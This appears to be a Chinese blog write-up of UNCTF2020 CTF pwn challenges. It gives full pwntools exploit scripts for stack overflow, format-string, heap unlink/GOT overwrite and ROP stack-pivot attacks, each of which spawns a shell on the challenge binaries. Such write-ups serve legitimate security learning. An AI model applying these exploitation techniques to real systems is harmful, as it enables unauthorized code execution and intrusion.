YLBNB

  用pwntools直接连接,然后接受就行。

1 from pwn import *

2

3 p = remote('45.158.33.12',8000)

4 context.log_level = 'debug'

5 print p.recvuntil('}')[-30:]

fan

  简单的栈溢出,直接覆盖返回地址为shell的地址就行。

1 from pwn import *

2

3 p = process('./pwn')

4 #p = remote('node2.hackingfor.fun',33550 )

5

6 shell = 0x000400735

7 payload = 'a'*0x30 + 'bbbbbbbb' + p64(shell)

8 p.send(payload)

9 p.interactive()

do_you_like_me?

  和上一题几乎一模一样...估计是不同学校的出题人没有商量好。

1 from pwn import *

2

3 p = process('./pwn')

4 #p = remote('node2.hackingfor.fun',33436)

5

6 shell = 0x004006CD

7 payload = 'a'*0x10 + 'bbbbbbbb' + p64(shell)

8 p.send(payload)

9 p.interactive()

你真的会pwn嘛?

  存在格式化字符串漏洞,修改bss上的数据不为0就可以了。这里用的pwntools的模块直接生成的。

 1 from pwn import *

 2

 3 p = process('./pwn')

 4 #p = remote('node2.hackingfor.fun',38272)

 5 context(os='linux',arch='amd64',log_level='debug')

 6

 7 attack_addr = 0x060107C

 8 payload = payload = fmtstr_payload(10,{attack_addr:1})

 9 p.sendline(payload)

10 p.interactive()

baby_heap

  程序本身有system("/bin/sh"),然后存在off-by-one漏洞,我这里利用unlink拿到一个可以读写的指针,打free_got让指向shell,然后free就拿到shell了。这题还侥幸拿了一血。

 1 from pwn import *

 2

 3 p = process('./pwn')

 4 #p = remote('node2.hackingfor.fun',32488)

 5 elf = ELF('./pwn')

 6 context.log_level = 'debug'

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 def add(size,content):

13     p.sendlineafter('>> ','1')

14     p.sendlineafter('size?\n',str(size))

15     p.sendafter('content?\n',content)

16

17 def edit(index,content):

18     p.sendlineafter('>> ','4')

19     p.sendlineafter('index ?',str(index))

20     p.sendafter('content ?\n',content)

21

22 def delete(index):

23     p.sendlineafter('>> ','2')

24     p.sendlineafter('index ?',str(index))

25

26 fd = 0x0602160-0x18

27 bk = 0x0602160-0x10

28 shell = 0x040097F

29 free_got = elf.got['free']

30 system_got = elf.got['system']

31

32 add(0x88,'bhxdn') #0

33 add(0x90,'bhxdn') #1

34 edit(0,p64(0)*2+p64(fd)+p64(bk)+p64(0)*12+p64(0x80)+'\xa0')

35 delete(1)

36 edit(0,p64(0)*3+p64(free_got))

37 edit(0,p64(shell))

38 delete(0)

39 p.interactive()

40 #duan()

keer's bug

  存在栈溢出,但是没有足够的长度让我们写rop,这里先修改rbp为bss段上的地址,然后将返回地址覆盖成main函数中间的地方。然后再一个read,在bss段写rop泄露libc,然后栈转移回去bss段执行leak libc_base,之后再执行main函数,将返回地址覆盖成one_gadget拿shell,除了做csu,还是第一次知道栈能这么玩。(感谢L0ne1y师傅的指点)

 1 from pwn import *

 2

 3 p = process('./pwn')

 4 #p = remote('node2.hackingfor.fun',36522)

 5 elf = ELF('./pwn')

 6 libc = ELF('./libc.so.6')

 7 context.log_level = 'debug'

 8

 9 #gdb.attach(p,'b *0x00040060D')

10

11 buf = 0x0601060+0x100

12 pop_rsi_r15 = 0x000400671

13 pop_rdi = 0x000400673

14 fun_got = elf.got['write']

15 write_plt = elf.plt['write']

16 read_plt = elf.plt['read']

17 main = elf.symbols['main']

18 leave_ret = 0x0040060D

19

20 ret = 0x004005ED

21 payload = 'a'*0x50+p64(buf)+p64(ret)

22 p.sendafter('keer!!!\n',payload)

23

24 sleep(0.5)

25 payload = p64(pop_rdi)+p64(1)

26 payload +=p64(pop_rsi_r15)+p64(fun_got)+p64(0)+p64(write_plt)

27 payload +=p64(main)+p64(0)*3+p64(buf-0x58)+p64(leave_ret)

28 p.send(payload)

29 libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.symbols['write']

30 print hex(libc_base)

31

32 shell = libc_base + 0xf0364

33 payload =p64(0)*11+p64(shell)

34 #gdb.attach(p)

35 p.send(payload)

36 p.interactive()

UNCTF2020 pwn题目的更多相关文章

  1. SCTF 2014 pwn题目分析

    因为最近要去做ctf比赛的这一块所以就针对性的分析一下近些年的各大比赛的PWN题目.主防项目目前先搁置起来了,等比赛打完再去搞吧. 这次分析的是去年的SCTF的赛题,是我的学长们出的题,个人感觉还是很 ...

  2. 解决pwn题目加载指定libc版本的问题

    因为本地和远程的libc版本不同,pwn题目调试起来会有影响,所以来记录一下用patchelf和glibc-all-in-one来解决这个问题过程. 下载工具 下载patchelfgit clone ...

  3. BIT 常态化在线CTF系统 pwn题目

    偶然得到这个平台,发现是BIT的CTF平台,应该是平时的阶段性的训练题目.看了看题,其他方向的题目感觉都是入门题,但是pwn题目,发现还是比入门题难一点点的,来记录一下. pwn1 栈上任意位置的读写 ...

  4. 2020 NUPCTF pwn题目

    去年的一场比赛,今年来把去年不会做的题目来看一下,只在buu找到三道题,剩下两道好像是内核题,算了,估计找到也不会做. npuctf_2020_level2 bss段上的格式化字符串漏洞的利用. 程序 ...

  5. WHUCTF PWN题目

    花了大概两天时间来做WHUCTF的题目,第一次排名这么靠前.首先感谢武汉大学举办这次萌新赛,也感谢fmyy的师傅的耐心指导,让我第一次做出堆的题目来. pwnpwnpwn 这是一道栈题目,32位程序, ...

  6. 使用pwn_deploy_chroot部署国赛pwn比赛题目

    目录 使用pwn_deploy_chroot部署国赛pwn比赛题目 一.前言 二.Docker 三.部署镜像 四.pwn_deploy_chroot 五.check && exp 六. ...

  7. pwn学习之二

    刚刚开始学习pwn,记录一下自己学习的过程. 今天get了第二道pwn题目的解答,做的题目是2017年TSCTF的easy fsb,通过这道题了解了一种漏洞和使用该漏洞获取shell的方法:即格式化字 ...

  8. pwn学习之一

    刚刚开始学习pwn,记录一下自己学习的过程. 今天完成了第一道pwn题目的解答,做的题目是2017年TSCTF的bad egg,通过这道题学习到了一种getshell的方法:通过在大小不够存储shel ...

  9. Linux pwn入门教程(3)——ROP技术

    作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html 0×00 背景 在上一篇教程的<shellco ...

随机推荐

  1. C#疑问

    在Microsoft.NET里面int=Int32Int64=long但是在其他.NET环境下面可能不是这样的.C#是一门计算机编程语言,是经过标准化,也就是说其他的人也可以根据它的语法去实现它的编译 ...

  2. 高并发异步解耦利器:RocketMQ究竟强在哪里?

    上篇文章消息队列那么多,为什么建议深入了解下RabbitMQ?我们讲到了消息队列的发展史: 并且详细介绍了RabbitMQ,其功能也是挺强大的,那么,为啥又要搞一个RocketMQ出来呢?是重复造轮子 ...

  3. GeoServer style 配置样例

    <?xml version="1.0" encoding="UTF-8"?> <StyledLayerDescriptor version=& ...

  4. UI自动化测试:App的WebView页面中,当搜索栏无搜索按钮时处理方法

    一.遇到的问题 在做移动端的UI自动化测试时,经常会遇到上图所示的搜索框,这里有个麻烦就是搜索框没有"搜索"按钮,UI自动化测试时不能确认搜索. 要解决这个问题,我们可以通过 dr ...

  5. 使用Python定时清理运行超时的pdflatex僵尸进程

    问题 在我们之前的<基于texlive定制chemfig化学式转换Python服务镜像>定制的pdflatex在线转换的镜像已经运行在生产环境了,但是最近总有人反馈服务跑着跑着就慢了,本来 ...

  6. 难道你还不知道Spring之事务的回滚和提交的原理吗,这篇文章带你走进源码级别的解读。

    上一篇文章讲解了获取事务,并通过获取的connection设置只读,隔离级别等:这篇文章讲事务剩下的回滚和提交. 事务的回滚处理 之前已经完成了目标方法运行前的事务准备工作.而这些准备工作的最大目的无 ...

  7. 洛谷 P6060 - [加油武汉]传染病研究(数论)

    洛谷题面传送门 一道不算太难的题,题解稍微写写吧( 首先根据约数个数和公式,对于一个 \(n=p_1^{\alpha_1}·p_2^{\alpha_2}·\cdots·p_m^{\alpha_m}\) ...

  8. Codeforces 258E - Little Elephant and Tree(根号暴力/线段树+标记永久化/主席树+标记永久化/普通线段树/可撤销线段树,hot tea)

    Codeforces 题目传送门 & 洛谷题目传送门 yyq:"hot tea 不常有,做过了就不能再错过了" 似乎这是半年前某场 hb 模拟赛的 T2?当时 ycx.ym ...

  9. 【5】蛋白质组学鉴定定量软件之PD

    目录 1.简介 2.安装与配置 3.分析流程 4.结果 1.简介 PD全称Proteome Discoverer,是ThermoFisher在2008年推出的商业Windows软件,没错,收费,还不菲 ...

  10. 【宏基因组】MEGAN4,MEGAN5和MEGAN6的Linux安装和使用

    MEGAN(Metagenome Analyzer)是宏基因组学进行物种和功能研究的常用软件,实际上现在的Diamond+MEGAN6已经是一套比较完整的物种和功能注释流程了. 但是由于各种原因,我们 ...